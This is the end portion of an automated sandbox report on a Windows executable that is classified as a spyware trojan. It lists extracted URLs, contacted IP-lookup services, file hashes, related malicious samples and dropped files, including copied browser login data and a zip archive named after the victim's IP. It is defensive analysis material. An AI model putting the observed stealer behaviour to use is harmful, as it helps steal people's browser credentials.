                                                                                                                                        https://gitlab.com/-/speedscope/index.htmlhJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://aka.ms/nativeaot-compatibilityYhJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.google.com/recaptcha/hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.newtonsoft.com/jsonschemahJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://sourcegraph.comhJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://github.com/dotnet/linker/issues/2715.hJ1bl8p7dJ.exefalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/dotnet/runtime/issues/50820hJ1bl8p7dJ.exefalse
                                                                                                                                                        		high
                                                                                                                                                        https://aka.ms/GlobalizationInvariantModehJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://github.com/ericsink/SQLitePCL.rawhJ1bl8p7dJ.exefalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.nuget.org/packages/Newtonsoft.Json.BsonhJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://api.ipify.orgYhJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://urn.to/r/sds_see12https://urn.to/r/sds_see2hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://system.data.sqlite.org/hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.sqlite.org/rescode.htmlhJ1bl8p7dJ.exefalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://github.com/mono/linker/issues/1187hJ1bl8p7dJ.exefalse
                                                                                                                                                                      		high

                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public IPs

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      208.95.112.1
                                                                                                                                                                      		ip-api.comUnited States
                                                                                                                                                                      		53334TUT-ASUSfalse
                                                                                                                                                                      172.65.251.78
                                                                                                                                                                      		gitlab.comUnited States
                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                      104.26.12.205
                                                                                                                                                                      		api.ipify.orgUnited States
                                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                                      Private

                                                                                                                                                                      IP
                                                                                                                                                                      127.0.0.1

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                      Analysis ID:1590664
                                                                                                                                                                      Start date and time:2025-01-14 13:11:20 +01:00
                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 7m 18s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Sample name:hJ1bl8p7dJ.exe
                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                      Original Sample Name:ddefa728f5ff2f70fd097609edc4e918afd5fa212115ba2b06f818c1263df23f.exe
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal72.troj.spyw.winEXE@17/12@3/4
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 88%
                                                                                                                                                                      • Number of executed functions: 12
                                                                                                                                                                      • Number of non-executed functions: 93
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                      Warnings

                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.97, 2.23.242.162, 52.109.89.19, 52.113.194.132, 199.232.214.172, 52.111.236.35, 52.111.236.33, 52.111.236.34, 52.111.236.32, 20.44.10.122, 2.21.65.149, 2.21.65.130, 13.107.246.45, 20.190.159.75, 172.202.163.200
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.n
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      No simulations

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      208.95.112.1DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      zbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ip-api.com/json/8.46.123.189
                                                                                                                                                                      rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      • ip-api.com/line/?fields=hosting

                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      gitlab.comDYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      bg.microsoft.map.fastly.netnNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                      pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                      PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                      1579614525244583223.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                      New purchase order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                      35491083472324549.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                      28236151432955330765.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                      ProductBOMpq_v4.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                      17201670993971103.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                      Scanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 199.232.210.172

                                                                                                                                                                      ASNs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      CLOUDFLARENETUSDYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                      DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      zbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                      http://www.pentamx.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                      • 1.1.1.1
                                                                                                                                                                      CLOUDFLARENETUSDYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                      DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      zbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                      #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                      http://www.pentamx.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                      • 1.1.1.1
                                                                                                                                                                      TUT-ASUSDYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      zbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      • 208.95.112.1

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eDYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      zbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                      • 104.26.12.205

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      C:\Users\user\Desktop\e_sqlite3.dllDYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  #U2800.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\Users\Public\Documents\638724355399194976\Default_LoginDataTemp.db

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\Public\Documents\638724355399194976\Files\D\hwcompat.txt

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):751624
                                                                                                                                                                                    Entropy (8bit):4.941596949315087
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                                                    MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                                                    SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                                                    SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                                                    SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue

                                                                                                                                                                                    C:\Users\Public\Documents\Backup_[United States]_8.46.123.189_[1401].zip

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):95768
                                                                                                                                                                                    Entropy (8bit):7.998162537514399
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:3kcyrIJHebs0wzUCvL0d7FrIDl0nsVFxyT2sl3a7cv/OHkTiw4Qthnq2jxZ2OFoO:0mJ+phC0d7ey73a6OEmsTnq2jxkOWwi6
                                                                                                                                                                                    MD5:975783A17B48F32292DA195062809182
                                                                                                                                                                                    SHA1:A9A016E5E891C0F09A244C8BFF551498ADEBBDA9
                                                                                                                                                                                    SHA-256:35A8A0C6FFEBE3591EC466B3ED396DD44C17F133BE27088FE613219C6524CAA0
                                                                                                                                                                                    SHA-512:798BE6CE01E86B1D7F5B7BD160BE8B6DBFA0AD88C2E40C149D1984478B6367DEDAB01EB2B9E90B0C20E7B4737B53ACE410932DF22016C81F178883A015DEC69C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:PK..-......9.Z.8n~............D/hwcompat.txt.....x......Zu........,!..W......%=N..'....S{n.2.q..1.|.e..U.G.V....~.../Q;..!30......K=.&...U..(..7.....?L#m,....&.(..}..N..|...d...v9....g.B.f...H^......xK.X..0...a7^w5Y#..D|.....;.@,.#.?v.o..........W.(b..4EX....,.!..l..'.M...jx..B}.........'&.K.JY&...7*.....Jj..r..?D..>.....9........".]..(..[....8.H..c.?.]...Mw......t#...f4...P[7...._....#v.R......5D......e....-;....D..8U8...0..,#...y.....;.%R.~u.d..W.F\.i.....&.l.../v...6...I.U........Hmv...h..>&.[`t.?..p.x..S.Uv.... .d[..621*.b.....+g....x.} .....iq..."..R....#t....9..#...h..,.jP..v..../A.Tu.....Pt.@.`%p.....%E..\f..l.....)..M[..(...$..g..B'......E.ca4.!.mn5b..H.<u.....Gk.j.......NE..^?.3..U.l...7Ly...Y..y..bf.a.2y.u..(.x./....n....|.d..eyA.!..7 .b.]..7...t`....... .....O|......B.Jt\.J..ER%.....Y:...;..z../@.5.I..dji.y;dp.P..`n..*D.Km.....~Wn....(..._{.o..V.S...;....|..Z..qt)..5.o.*.&....X.3uy..\...<. ....7u..1n.U..K...?zy.S..+.]. x....=C

                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                    Entropy (8bit):4.147870920005786
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FiWWltlEkjgh/JVJExcBUDmTKTPr3tlwBVP/Sh/JzvghwRHIsKqJBQIl0:o1Ez/fJPUDmTEdlwBVsJDYOIeBQB
                                                                                                                                                                                    MD5:1C5000AD0701FE4ED9B9F327CC2D8BB2
                                                                                                                                                                                    SHA1:4F73D7F0067F38626D74A787EA8F90C0150998A2
                                                                                                                                                                                    SHA-256:ED48330D993225260EE6794F39B6AAAC2BB1CF24F14763CCB092E24A8B5B6784
                                                                                                                                                                                    SHA-512:A7985E7C460CC045E5CB75B2D1A72F1D642B78A9A6A54B426B4B9B529E80C04C4652361BBD68635F91B0B0FC1CA40F2FBA47A3A34E276DE32D46267221E505C5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:sdPC..........................A...a.Tp"Ep/IEjrCOzDaHH8Lyds/cyKfGU6kWe/UyKSCE9A7WNk="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................487f69de-52fa-434b-98f3-2f0d2be104d4............

                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\DevToolsActivePort

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):59
                                                                                                                                                                                    Entropy (8bit):4.490457193642897
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:m7BATRKSuyEgCV8nnAcV6XAan:m7Bt5vML6XFn
                                                                                                                                                                                    MD5:9413D55C1B5C5E1A1EB60249F843E555
                                                                                                                                                                                    SHA1:EDC3BDC7E1C8AE575B2FD842D19515B328CA0A84
                                                                                                                                                                                    SHA-256:B3170879A34D51315BB4C4621392E4B51E865777583A186A3D557651D8FF4BDF
                                                                                                                                                                                    SHA-512:44BAB8BAFE7C124F68F888464C215F6965C957FA674EC075D8F451A5BBBC2BD5C60325308B34642E1B287B75846F29BF598F1A98D8D2F27B5869916A0CB5CE68
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:9230./devtools/browser/86fe4520-d45e-4c41-b7d5-9038c60c2e1f

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mso1C19.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                    File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):663
                                                                                                                                                                                    Entropy (8bit):5.949125862393289
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                                    MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                                    SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                                    SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
